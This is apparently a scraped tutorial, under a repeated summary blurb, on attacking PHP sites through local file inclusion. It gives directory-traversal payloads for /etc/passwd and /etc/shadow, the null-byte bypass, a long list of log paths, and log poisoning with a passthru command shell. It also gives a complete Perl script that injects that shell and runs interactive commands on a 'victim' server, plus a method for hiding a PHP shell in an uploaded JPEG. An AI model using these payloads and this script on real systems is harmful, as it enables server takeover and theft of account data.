0 оценок0% нашли этот документ полезным (0 голосов)
238 просмотров5 страниц
This document describes how to exploit a website vulnerable to local file inclusion (LFI) by accessing restricted files and injecting PHP code to run commands on the server. It explains how to find vulnerable PHP code that directly includes user-supplied pages, use directory traversal to access files outside the web root like /etc/passwd, inject code into log files to execute commands, and upload a shell payload hidden in a JPEG image file.
This document describes how to exploit a website vulnerable to local file inclusion (LFI) by accessing restricted files and injecting PHP code to run commands on the server. It explains how to find vulnerable PHP code that directly includes user-supplied pages, use directory traversal to access files outside the web root like /etc/passwd, inject code into log files to execute commands, and upload a shell payload hidden in a JPEG image file.
This document describes how to exploit a website vulnerable to local file inclusion (LFI) by accessing restricted files and injecting PHP code to run commands on the server. It explains how to find vulnerable PHP code that directly includes user-supplied pages, use directory traversal to access files outside the web root like /etc/passwd, inject code into log files to execute commands, and upload a shell payload hidden in a JPEG image file.
This tutorial will guide you into the process of exploiting a website thru the L
FI (Local File Inclusion).
First lets take a look at a php code that is vulnerable to LFI: PHP Code: <?php $page = $_GET[page]; include($page); ?> Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world. Ok, now that we know why is it vulnerable let's start to use this in our advanta ge. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called tes t.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php cod e that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you wi ll have to type victim.com/test/index.php?page=../test.php . The ../ is called directory transversal using that will allow you to go up in the directories. Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is): victim.com/index.php?page=../../../../../../../etc/passwd If you don't know what to do with the content of etc/passwd then continue readin g! :puah[1]: The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this: Quote: username: passwd:UID:GID:full_name:directory:shell For example: username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh All you need to do then is grab the username and decode the password. If the pas swd file is shadowed then you'll see something like this: username:x:503:100:FullName:/home/username:/bin/sh As you can see the password is now a x and the encoded password is now in /etc/s hadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many processes, thats why you have access to it). You can also sometimes see something like this: username:!:503:100:FullName:/home/username:/bin/sh The ! indicates that the encoded password is stored in the etc/security/passwd f ile. Heres a couple of places that may be interesting to "visit": Quote: /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security/mkuser.default You will probably need to google for it as this is not the right tutorial to it. Just one more quick thing, its also common to find a vulnerable code like: PHP Code: <?php $page = $_GET["page"]; include("$page.php"); ?> In this case as you can see it will add a .php in the end of whatever you includ e! So if you type in your browser: victim.com/index.php?file=../../../../../../../../etc/passwd it will retrieve: victim.com/index.php?file=../../../../../../../../etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte (%00): victim.com/index.php?file=../../../../../../../../etc/passwd%00 With the null byte the server will ignore everything that comes after %00. There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin! We will now gonna try to run commands on the server, we will do this by injectin g php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some location s that may be useful to you: Quote: ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log Ok, now that you know where the logs are take a look at them and see what they s tore, at this example we will use a log that stores the "not found files" and the php code <? passthru(\$_GET[cmd]) ?>. You will then ty pe at your browser victim.com/<? passthru(\$_GET[cmd]) ?> and the php code will be logged because it "dosen't exist". This possibly won't work because if you go look into the log you will probably s ee the php code like this: Quote: %3C?%20passthru(\$_GET[cmd])%20?> because your browser will url encode the whole thing! So you'll need to use some thing else, if you don't have a script of your own you can use this perl script i've wrote: #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code="<? passthru(\$_GET[cmd]) ?>"; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path.$code." HTTP/1.1\r\n"; print $socket "User-Agent: ".$code."\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "\nCode $code sucssefully injected in $log \n"; print "\nType command to run or exit to end: "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = <STDIN>; } Copy/paste that, save it as whatever.pl and change what is in bold accordingly t o your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../.. /../../../../../etc/httpd/logs/error_log to where the log is at! That script will inject the code and then will ask you for a command to run on t he server! You know what to do now! Last but not least we will take a look on how to use the avatar/image upload fun tion found in a lot of web aplications. You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website! This is a quick explanation, for a better understanding you can view the video a t http://www.milw0rm.com/video/watch.php?id=57 You need to "insert" the php code you want to execute inside the image, to do th is you'll need to use your favorite hex editor or you can use the edjpgcom download http://software.security-shell.com/i...e=edjpgcom.zipprogram (all you n eed to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it! Now that you have a list of potential sites that may have a forum or something e lse that allows you to upload your image all you need to do is take some time to browse thru them until you find one! After you found one and have uploaded your image here is tricky part, you'll nee d to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this: Quote: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result reso urce in /home/sitefolder/public_html/includes/view.php on line 37 If you can't force an error go back to the etc/passwd file: Quote: username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh As you can see the username is also the directory name, most of the times the na me is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for! Go to your avatar image right click on it and then properties (write down the pa th to it), you'll now all set up. In your browser type this (again, the nr of ../ may vary): Quote: victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_h tml/path_to_your_avatar/avatar.jpg In order "words" should look like this (using fictitious "names"): Quote: victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/u ploads/avatar.jpg After you type this you will see the result of the code inserted in the ! And thats all, this is the most common ways you can exploit with the LFI. Hope y ou have enjoyed tutorial at SecurityTeam